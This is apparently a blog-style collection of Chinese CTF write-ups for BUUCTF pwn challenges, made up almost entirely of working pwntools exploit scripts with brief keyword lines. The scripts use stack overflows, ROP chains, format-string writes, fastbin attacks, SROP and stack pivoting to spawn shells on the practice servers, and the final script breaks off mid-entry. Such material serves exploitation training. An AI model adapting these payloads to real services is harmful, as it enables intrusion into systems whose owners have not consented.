Buuctf刷题:部分
get_started_3dsctf_2016
关键词:ROP链、栈溢出、mprotect()函数
可参考文章(优质): https://www.cnblogs.com/lyxf/p/12113401.html
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
#context.arch = 'i386'
elf = ELF('./get_started_3dsctf_2016')
catflag = 0x080489B8
pop3_addr = 0x080509a5
main_addr = 0x08048A20
# mprotect_addr = 0x0806EC80
mprotect_addr = elf.sym['mprotect']
read_addr = elf.sym['read']
write_got_plt = 0x080EB000
bss_addr = 0x080ea000
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
# start_addr = write_got_plt
start_addr = bss_addr
addr_len = 0x1000
prot_rwx = 0x4+0x2+0x1
if debug == 1:
sh = process('./get_started_3dsctf_2016')
else:
sh = remote(ip,port)
# payload = 'a'*0x38 + p32(catflag)
# sh.sendline(payload)
payload = ''
payload +='a'*0x38 + p32(mprotect_addr)
payload += p32(pop3_addr) + p32(start_addr) + p32(addr_len) + p32(prot_rwx)
payload += p32(read_addr) + p32(pop3_addr) + p32(0) + p32(start_addr) + p32(0x100)
payload += p32(start_addr)
sh.sendline(payload)
shellcode = asm(shellcraft.sh(),arch = 'i386',os = 'linux')
sh.sendline(shellcode)
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',26297,0)
[第五空间2019 决赛]PWN5
关键词:格式化字符串漏洞
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./pwn')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./pwn')
else:
sh = remote(ip,port)
unk_804C044_addr = 0x0804C044
'''
system_addr = 0x08049080
read_addr = elf.got['read']
atoi_addr = elf.got['atoi']
offset = 10
sh.recvuntil('name:')
payload1 = fmtstr_payload(offset,{atoi_addr,system_addr})
sh.sendline(payload1)
sh.recvuntil('passwd:')
sh.sendline('/bin/sh\x00')
'''
payload2 = p32(unk_804C044_addr) + '%10$n'
sh.recvuntil('name:')
sh.sendline(payload2)
sh.recvuntil('passwd:')
sh.sendline(str(0x00000004))
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',28821,0)
[BJDCTF 2nd]r2t3
关键词:整数溢出、栈溢出
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./r2t3')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./r2t3')
else:
sh = remote(ip,port)
system_addr = 0x0804858B
payload = ('a'*0x11 + 'a'*0x4 +p32(system_addr)).ljust(260,'a')
sh.recvuntil('name:\n')
sh.sendline(payload)
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',28216,0)
ciscn_2019_n_8
关键词:栈溢出
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./ciscn_2019_n_8')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./ciscn_2019_n_8')
else:
sh = remote(ip,port)
sh.recvuntil('name?')
sh.sendline('a'*13*4 + p64(0x11)+'bbbb')
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',29708,0)
not_the_same_3dsctf_2016
关键词:栈溢出、ROP链、mprotect
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'i386'
elf = ELF('./not_the_same_3dsctf_2016')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./not_the_same_3dsctf_2016')
else:
sh = remote(ip,port)
pop3_addr = 0x0809e3e5
# flag_addr = 0x080489A0
read_addr = elf.sym['read']
mprotect_addr = elf.sym['mprotect']
start_addr = 0x080ea000
addr_len = 0x1000
addr_rwx = 0x7
bss_addr = 0x080EBF80
# main_addr = elf.sym['main']
payload = 'a'*0x2D + p32(mprotect_addr)
payload += p32(pop3_addr) + p32(start_addr) + p32(addr_len) + p32(addr_rwx)
payload += p32(read_addr) + p32(pop3_addr) + p32(0) + p32(start_addr) + p32(0x200)
payload += p32(start_addr)
sh.sendline(payload)
shellcode = asm(shellcraft.sh(),arch = 'i386',os = 'linux')
sh.sendline(shellcode)
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',25323,0)
jarvisoj_level0
关键词:栈溢出
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./level0')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./level0')
else:
sh = remote(ip,port)
system_addr = 0x0000000000400596
payload = 'A'*0x88 + p64(system_addr)
sh.sendline(payload)
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',27804,0)
[BJDCTF 2nd]one_gadget
关键词:libc链接、one_gadget
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./one_gadget')
libc = ELF('./libc-2.29.so')
sh = 0
def pwn(ip,port,debug):
global sh
global libc
if debug == 1:
sh = process('./one_gadget')
else:
sh = remote(ip,port)
sh.recvuntil('0x')
printf_addr = int(sh.recvn(12),16)
print '-----printf_addr = ' + hex(printf_addr)
libc_base = printf_addr - libc.sym['printf']
one_gadget_addr = 0x106ef8
system_addr = libc_base + one_gadget_addr
sh.recvuntil('gadget:')
sh.sendline(str(system_addr))
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',29133,0)
[HarekazeCTF2019]baby_rop
关键词:栈溢出、ROP链
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
# context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./babyrop')
#libc = ELF('./')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./babyrop')
else:
sh = remote(ip,port)
bin_sh_addr = 0x0000000000601048
system_addr = 0x0000000000400490
pop_rdi_addr = 0x0000000000400683
offset = 0x10
payload = 'a'*(offset+8) + p64(pop_rdi_addr) + p64(bin_sh_addr) + p64(system_addr) + p64(0x00000000004005D6)
sh.sendlineafter('name?',payload)
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',29851,0)
jarvisoj_level2
关键词:栈溢出
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'i386'
elf = ELF('./level2')
#libc = ELF('./')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./level2')
else:
sh = remote(ip,port)
system_addr = 0x08048320
bin_sh_addr = 0x804A024
offset = 0x88
payload = 'a'*(offset+4) + p32(system_addr) + p32(0x0804849E) + p32(bin_sh_addr)
sh.sendlineafter('Input:\n',payload)
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',25952,0)
babyheap_0ctf_2017
关键词:fastbin attack、malloc_hook函数改写
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./babyheap_0ctf_2017')
libc = ELF('./libc-2.23.so')
sh = 0
lib = 0
def offset_bin_main_arena(idx):
word_bytes = context.word_size / 8
offset = 4 # lock
offset += 4 # flags
offset += word_bytes * 10 # offset fastbin
offset += word_bytes * 2 # top,last_remainder
offset += idx * 2 * word_bytes # idx
offset -= word_bytes * 2 # bin overlap
return offset
offset_unsortedbin_main_arena = offset_bin_main_arena(0)
def allocate(size):
sh.recvuntil('Command: ')
sh.sendline('1')
sh.recvuntil('Size: ')
sh.sendline(str(size))
def fill(idx,content):
sh.recvuntil('Command: ')
sh.sendline('2')
sh.recvuntil('Index: ')
sh.sendline(str(idx))
sh.recvuntil('Size: ')
sh.sendline(str(len(content)))
sh.recvuntil('Content: ')
sh.send(content)
def free(idx):
sh.recvuntil('Command: ')
sh.sendline('3')
sh.recvuntil('Index: ')
sh.sendline(str(idx))
def dump(idx):
sh.recvuntil('Command: ')
sh.sendline('4')
sh.recvuntil('Index: ')
sh.sendline(str(idx))
#sh.recvline()
# return p.recvline()
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./babyheap_0ctf_2017')
else:
sh = remote(ip,port)
allocate(0x10)#0
allocate(0x10)#1
allocate(0x10)#2
allocate(0x10)#3
allocate(0x80)#4
free(2)
free(1)
payload1 = 0x10*'a' + p64(0) + p64(0x21) + p8(0x80)
fill(0,payload1)
payload2 = 0x10*'b' + p64(0) + p64(0x21)
fill(3,payload2)
allocate(0x10) #5--1
allocate(0x10) #6--2
payload3 = 'c' * 0x10 + p64(0) + p64(0x91)
fill(3,payload3)
allocate(0x80) #7--4
free(4)
dump(2)
sh.recvuntil('Content: \n')
unsortedbin_addr = u64(sh.recv(8).strip().ljust(8,'\x00'))
print 'unsortedbin_addr =' + hex(unsortedbin_addr)
print 'offset_unsortedbin_main_arena = ' + hex(offset_unsortedbin_main_arena)
main_arena = unsortedbin_addr - offset_unsortedbin_main_arena
log.success('main arena addr: ' + hex(main_arena))
main_arena_offset = 0x3c4b20
libcbase = main_arena - main_arena_offset
log.success('libcbase = ' + hex(libcbase))
allocate(0x60)#8--4
free(4)
fake_chunk_addr = main_arena - 0x33
print 'fake_chunk_addr = ' + hex(fake_chunk_addr)
fake_chunk = p64(fake_chunk_addr)
fill(2,fake_chunk)
allocate(0x60) #9 --4
allocate(0x60) #10 --6
malloc_hook_offset =0x0000000003c4b10
fake_chunk_offset = 0x3c4b20
one_gadget_addr = libcbase + 0x4526a
print ' one_gadget_addr = ' + hex(one_gadget_addr)
payload4 = 0x13*'d' + p64(one_gadget_addr)
fill(6,payload4)
allocate(0x100)
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',26418,0)
# pwn('127.0.0.1',10001,0)
bjdctf_2020_babystack
关键词:栈溢出
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
# context.arch = 'i386'
elf = ELF('./bjdctf_2020_babystack')
#libc = ELF('./bjdctf_2020_babystack')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./bjdctf_2020_babystack')
else:
sh = remote(ip,port)
#gdb.attach(sh)
system_binsh_addr = 0x0000000004006E6
offset = 0x10
payload = offset * 'a' + 'a'*8 + p64(system_binsh_addr)
sh.recvuntil(':\n')
sh.sendline('100')
sh.recvuntil('name?\n')
sh.sendline(payload)
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',25168,0)
ciscn_2019_s_3
关键词:asm程序、ROP链、SROP链、通用gadget、系统调用59( sys_execve )、系统调用15( sys_rt_sigreturn )、SigreturnFrame的使用
way1:SROP、csu、sys_execve
from pwn import *
p = process('./ciscn_s_3')
elf = ELF('./ciscn_s_3')
context.log_level = 'debug'
main_addr = elf.symbols['main']
csu_end = 0x040059A
csu_front = 0x0400580
ret_addr = 0x004003a9
rax_59_ret = 0x04004E2
syscall = 0x400501
#gdb.attach(p,'b *0x00400589')
payload = '/bin/sh\x00' + 'A'*0x8 + p64(main_addr)
p.sendline(payload)
p.recv(0x20)
stack_addr = u64(p.recv(8))
print 'stack_addr-->' + hex(stack_addr)
binsh_addr = stack_addr - 0x138
rax_59 = binsh_addr + 0x10
pop_rdi = 0x04005a3
payload = '/bin/sh\x00' + 'A'*0x8 + p64(rax_59_ret) + p64(csu_end)
payload += p64(0) + p64(1) + p64(rax_59) + p64(0) + p64(0) + p64(0)
payload += p64(csu_front)
payload += 'a'*0x38
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(syscall)
p.sendline(payload)
p.interactive()
#pause()
way2:ROP、sigreturn
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
# context.arch = 'i386'
elf = ELF('./ciscn_s_3')
#libc = ELF('./')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./ciscn_s_3')
else:
sh = remote(ip,port)
main_addr = 0x00000000040051D
sigret = 0x0000000004004DA
syscall = 0x000000000400517
main=0x0004004ED
sigret=0x4004DA
sys=0x400517
pl1='/bin/sh\x00'*2+p64(main)
sh.send(pl1)
sh.recv(0x20)
sh1=u64(sh.recv(8))-280
print(hex(sh1))
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = sh1
frame.rsi = 0
frame.rdx = 0
frame.rip = sys
pl1='a'*16+p64(sigret)+p64(sys)+str(frame)
'''
def debug(addr):
raw_input('debug:')
gdb.attach(sh, "b *" + addr)
debug('0x400514')
'''
pl2='/bin/sh\x00'*2+p64(sigret)+p64(sys)+str(frame)
sh.send(pl2)
sh.interactive()
#gdb.attach(sh)
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',26048,1)
#pwn('127.0.0.1',10001,0)
jarvisoj_level2_x64
关键词:64位栈溢出
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'i386'
elf = ELF('./level2_x64')
#libc = ELF('./')
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if debug == 1:
sh = process('./level2_x64')
else:
sh = remote(ip,port)
system_addr = 0x0000000004004C0
bin_sh_addr = 0x000000000600A90
pop_rdi = 0x00000000004006b3
offset = 0x80
payload = 'a'*(offset+8) + p64(pop_rdi)+ p64(bin_sh_addr) + p64(system_addr)
sh.sendlineafter('Input:\n',payload)
sh.interactive()
if __name__ == '__main__':
pwn('node3.buuoj.cn',27698,1)
ciscn_2019_n_5
关键词:shellcraft.sh()、.bass段写入、栈溢出
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
# context.arch = 'i386'
elf = ELF('./ciscn_2019_n_5')
#libc = ELF('./')
ip = 'node3.buuoj.cn'
port = 27695
debug = 0
if debug == 1:
p = process('./ciscn_2019_n_5')
else:
p = remote(ip,port)
sh = asm(shellcraft.sh())
sh_addr = 0x000000000601080
payload = 'a'*0x28
payload += p64(sh_addr)
p.recvuntil('name\n')
p.sendline(sh)
p.recvuntil('me?\n')
p.send(payload)
p.interactive()
[HarekazeCTF2019]baby_rop2
关键词:ROP链、LibcSearcher(无libc)、printf函数泄露read地址
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
# context.arch = 'i386'
elf = ELF('./babyrop2')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 29490
debug = 0
if debug == 1:
p = process('./babyrop2')
else:
p = remote(ip,port)
read_got = elf.got['read']
read_plt = elf.plt['read']
printf_got = elf.got['printf']
printf_plt = elf.sym['printf']
main_addr = elf.sym['main']
pop_rdi = 0x0000000000400733
pop3_ret = 0x000000000040072e
pop_rsi_r15 = 0x0000000000400731
fmt_addr = 0x000000000400770
payload = 'a'*0x20+'b'*0x8
payload += flat([pop_rdi,fmt_addr,pop_rsi_r15,read_got,0,printf_plt,main_addr])
p.recvuntil('name?')
p.send(payload)
read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print 'read_addr = ',hex(read_addr)
libc = LibcSearcher('read',read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
payload = 'a'*0x28
payload += flat([pop_rdi,bin_sh_addr,system_addr])
p.recvuntil('name?')
p.send(payload)
#gdb.attach(p)
p.interactive()
ciscn_2019_ne_5
关键词:32位栈溢出、system('sh')
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./ciscn_2019_ne_5')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 25731
debug = 0
if debug == 1:
p = process('./ciscn_2019_ne_5')
else:
p = remote(ip,port)
bin_addr = 0x080482ea
system_addr = elf.sym['system']
payload = (0x48+0x4)*'a' + p32(system_addr) + p32(0xdeadbeef) + p32(bin_addr)
p.recvuntil('password:')
p.sendline('administrator')
p.recvuntil('Exit\n:')
p.sendline('1')
p.recvuntil('info:')
p.sendline(payload)
p.recvuntil('Exit\n:')
p.sendline('4')
#gdb.attach(p)
p.interactive()
pwn2_sctf_2016
关键词:无符号整型溢出、LibcSearcher、printf函数打印地址、打本地失败、打远程成功
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./pwn2_sctf_2016')
# libc = ELF('./libc')
ip = 'node3.buuoj.cn'
port = 27942
debug = 0
if debug == 1:
p = process('./pwn2_sctf_2016')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
int_0x80 = 0x80484CD
printf_plt = elf.sym['printf']
start_addr = 0x80483D0
main_got = elf.got['__libc_start_main']
main_plt = elf.sym['__libc_start_main']
print 'main_pkt =',hex(main_plt)
payload = 'a'*(0x2c+4) +p32(printf_plt) + p32(start_addr) + p32(0x80486F8) + p32(main_got)
# payload = 'a'*(0x2c+4) + p32(system_addr) + p32(0xdeadbeef) + p32(bin_sh_addr)
# gdb.attach(p)
# raw_input()
p.recvuntil('read?')
p.sendline('-12')
p.recvuntil('data!\n')
p.sendline(payload)
# addr = u32(p.recv()[-8:])
p.recvline()
p.recvuntil('said: ')
main_addr = u32(p.recv(4))
print 'main_addr = ' , hex(main_addr)
libc = LibcSearcher('__libc_start_main',main_addr)
libcbase = main_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
bin_sh_addr = libcbase + libc.dump('str_bin_sh')
log.success("libcbase:" + hex(libcbase))
log.success("system_addr:" + hex(system_addr))
log.success("bin_sh_addr:" + hex(bin_sh_addr))
payload2 = 'a'*(0x2c+4) + p32(system_addr) + p32(start_addr) + p32(bin_sh_addr)
p.recvuntil('read?')
p.sendline('-12')
p.recvuntil('data!\n')
p.sendline(payload2)
p.interactive()
ez_pz_hackover_2016
关键词:给出一个栈地址、动态调试找出栈偏移、\x00截断、shellcraft.sh()、溢出
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
# context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./ez_pz_hackover_2016')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 28566
debug = 0
if debug == 1:
p = process('./ez_pz_hackover_2016')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
p.recvuntil('crash: ')
stackaddr = int(p.recv(10),16)
print '-------------------'
print hex(stackaddr)
print '-------------------'
p.recv()
shellcode = asm(shellcraft.sh())
addr = stackaddr - 0x18-4
# gdb.attach(p,'b *0x08048600')
payload = 'crashme\x00' #+ 'aaaaaaaaaaaaaa'
payload = payload.ljust(0x16,'a')
payload += 'bbbb' + p32(addr) + shellcode
p.sendline(payload)
print p.recv()
# raw_input()
#gdb.attach(p)
p.interactive()
铁人三项(第五赛区)_2018_rop
关键词:ROP、32位DynELF、栈溢出
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
# context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./2018_rop')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 28506
debug = 0
if debug == 1:
p = process('./2018_rop')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
start_addr = 0x80483C0
read_plt = elf.sym['read']
read_got = elf.got['read']
write_plt = elf.sym['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
bss_addr = elf.sym['__bss_start']
can_write_addr = 0x804A020
def leak(address):
count = 0
data = ''
payload = 'a'*0x88 + 'bbbb' + p32(write_plt) +p32(start_addr) + p32(0x1) + p32(address) + p32(4)
p.sendline(payload)
data = p.recv(4)
log.debug("%#x => %s" % (address, (data or '').encode('hex'))) #打印搜索的信息
return data
d = DynELF(leak,elf=elf)
systemAddress = d.lookup('system', 'libc') #在libc文件中搜索system函数的地址
print "systemAddress:" + hex(systemAddress)
print '-------------------------write "/bin/sh"-------------'
payload1 = 'a'*0x88 + 'bbbb' + p32(read_plt) + p32(start_addr) + p32(0) + p32(bss_addr)+ p32(8)
p.sendline(payload1)
p.sendline('/bin/sh')
print '-------------------------get shell-------------------'
payload2 = 'a'*0x88 + 'bbbb' + p32(systemAddress) + p32(start_addr) + p32(bss_addr)
p.sendline(payload2)
#gdb.attach(p)
p.interactive()
关键词:ROP、LibcSearcher()、栈溢出
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
# context(arch = 'amd64', os = 'linux', endian = 'little')
context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./2018_rop')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 28506
debug = 0
if debug == 1:
p = process('./2018_rop')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
start_addr = 0x80483C0
read_plt = elf.sym['read']
read_got = elf.got['read']
write_plt = elf.sym['write']
write_got = elf.got['write']
main_addr = elf.sym['main']
bss_addr = elf.sym['__bss_start']
can_write_addr = 0x804A020
payload = 'a'*0x88 + 'bbbb' + p32(write_plt) + p32(start_addr) + p32(1) + p32(read_got)+ p32(4)
p.sendline(payload)
read_addr = u32(p.recv(4))
print 'read_addr =',hex(read_addr)
libc = LibcSearcher('read',read_addr)
libcbase = read_addr - libc.dump('read')
systemAddress = libcbase + libc.dump('system')
bin_sh_addr = libcbase + libc.dump('str_bin_sh')
print 'libcbase = ',hex(libcbase)
print 'systemAddress = ',hex(systemAddress)
print 'bin_sh_addr = ',hex(bin_sh_addr)
print '-------------------------get shell-------------------'
payload2 = 'a'*0x88 + 'bbbb' + p32(systemAddress) + p32(start_addr) + p32(bin_sh_addr)
p.sendline(payload2)
#gdb.attach(p)
p.interactive()
[Black Watch 入群题]PWN
关键词:栈迁移、LibcSearcher(write地址)
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
context.log_level = 'debug'
# context.arch = 'amd64'
context.arch = 'i386'
elf = ELF('./spwn')
libc = ELF('./libc')
ip = 'node3.buuoj.cn'
port = 26048
debug = 1
if debug == 1:
p = process('./spwn')
else:
p = remote(ip,port)
puts_got = elf.got['puts']
puts_plt = elf.sym['puts']
read_got = elf.got['read']
read_plt = elf.sym['read']
write_plt = elf.sym['write']
write_got = elf.got['write']
puts_addr = 0x8048350
execve_offset = 0x3a80c
pop_ebp = 0x080485ab
main_addr = elf.sym['main']
leave_ret = 0x08048511
bss_addr = 0x0804A300
payload = p32(write_plt) + p32(main_addr) + p32(1)+ p32(write_got) + p32(4)
payload2 = flat(['a'*0x18,bss_addr-4,leave_ret])
p.recvuntil('name?')
p.send(payload)
p.recvuntil('say?')
p.send(payload2)
write_addr = u32(p.recv(4))
print 'write_addr = ',hex(write_addr)
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
bin_sh_addr= libc_base + libc.dump('str_bin_sh')
payload3 = flat([system_addr,main_addr,bin_sh_addr])
p.recvuntil('name?')
p.sendline(payload3)
p.recvuntil('say?')
p.send(payload2)
#gdb.attach(p)
p.interactive()
ciscn_2019_es_2
关键词:栈迁移(双read、一printf。溢出空间0x8字节、打印ebp、栈迁移到栈空间,执行system)
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./ciscn_2019_es_2')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 26048
debug = 1
if debug == 1:
p = process('./ciscn_2019_es_2')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
hack_addr = 0x8048400
# start_addr = 0x8048450
leave_addr = 0x8048593
payload = 'a'*0x24 + 'bbbb'
p.recv()
p.send(payload)
p.recvuntil('bbbb')
ebp_addr = u32(p.recv(4))
ret_addr = u32(p.recv(4))
print hex(ebp_addr)
print hex(ret_addr)
payload2 ='dddd'+ p32(hack_addr) + p32(0x12345678) + p32(ebp_addr - 0x28) + '/bin/sh\x00'
payload2 = payload2.ljust(0x28,'c')
payload2 += p32(ebp_addr-0x38) + p32(leave_addr)
p.send(payload2)
p.interactive()
[BJDCTF 2nd]test
关键词:c语言system(x86_64)、x86_64提权、提权、关键单词过滤
#源码:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
char cmd[0x100] = {0};
puts("Welcome to Pwn-Game by TaQini.");
puts("Your ID:");
system("id");
printf("$ ");
gets(cmd);
if( strstr(cmd, "n")
||strstr(cmd, "e")
||strstr(cmd, "p")
||strstr(cmd, "b")
||strstr(cmd, "u")
||strstr(cmd, "s")
||strstr(cmd, "h")
||strstr(cmd, "i")
||strstr(cmd, "f")
||strstr(cmd, "l")
||strstr(cmd, "a")
||strstr(cmd, "g")
||strstr(cmd, "|")
||strstr(cmd, "/")
||strstr(cmd, "$")
||strstr(cmd, "`")
||strstr(cmd, "-")
||strstr(cmd, "<")
||strstr(cmd, ">")
||strstr(cmd, ".")){
exit(0);
}else{
system(cmd);
}
return 0;
}
提权命令:x86_64
bjdctf_2020_babyrop
关键词:ROP
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
# context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./bjdctf_2020_babyrop')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 29516
debug = 0
if debug == 1:
p = process('./bjdctf_2020_babyrop')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
pop_rdi = 0x0000000000400733
offset = 32
start_addr = 0x000000000400530
main_addr = 0x4006ad
read_got = elf.got['read']
read_plt = elf.sym['read']
puts_got = elf.got['puts']
puts_plt = elf.sym['puts']
pop3_ret = 0x000000000040072e
# gdb.attach(p,'b *0x00000000040067E')
payload = offset *'a' + 'b'*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.recv()
p.sendline(payload)
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
print hex(puts_addr)
# read_addr = u64(p.recv(6).ljust(8,'\x00'))
# print hex(read_addr)
# libc = LibcSearcher('read',read_addr)
# libcbase = read_addr - libc.dump('read')
libc = LibcSearcher('puts',puts_addr)
libcbase = puts_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
bin_sh_addr = libcbase + libc.dump('str_bin_sh')
print '----------libcbase = ',hex(libcbase)
print '----------system_addr = ',hex(system_addr)
print '----------bin_sh_addr = ',hex(bin_sh_addr)
payload2 = offset * 'a' + 'b'*8 + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)
p.recv()
p.sendline(payload2)
#gdb.attach(p)
p.interactive()
jarvisoj_level3
关键词:栈溢出、bss段地址写入'/bin/sh'
#!python
#coding:utf-8
from pwn import *
import binascii
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
# context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./level3')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 27623
debug = 0
if debug == 1:
p = process('./level3')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
read_got = elf.got['read']
read_plt = elf.sym['read']
write_got = elf.got['write']
write_plt = elf.sym['write']
offset = 136
main_addr = elf.sym['main']
start_addr = 0x8048350
data_addr = 0x804A022
leave_ret = 0x8048482
payload = offset * 'a' + 'bbbb' + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.recv()
p.sendline(payload)
write_addr = u32(p.recv(4))
print '---------write_addr = ',hex(write_addr)
libc = LibcSearcher('write',write_addr)
libc_base =write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump('str_bin_sh') #no str_bin_sh
payload1 = offset * 'a' + 'bbbb' + p32(read_plt) + p32(start_addr) + p32(0) + p32(data_addr) + p32(8)
p.recv()
p.sendline(payload1)
p.sendline('/bin/sh')
payload2 = offset * 'a' + 'bbbb' + p32(system_addr) + p32(main_addr) + p32(data_addr)
print p.recv()
p.sendline(payload2)
p.interactive()
[BJDCTF 2nd]r2t4
关键词:64位格式化字符串漏洞(有6个参数存在寄存器中)
#!python
#coding:utf-8
from pwn import *
from LibcSearcher import *
context(arch = 'amd64', os = 'linux', endian = 'little')
# context(arch = 'i386', os = 'linux', endian = 'little')
context.log_level = 'debug'
elf = ELF('./r2t4')
# libc = ELF('./libc.so.6')
ip = 'node3.buuoj.cn'
port = 29997
debug = 0
if debug == 1:
p = process('./r2t4')
else:
p = remote(ip,port)
# p = remote('127.0.0.1',10001)
back_door = 0x000000000400626
read_got = elf.got['read']
stack_chk_fail = elf.got['__stack_chk_fail']
offset = 2+6
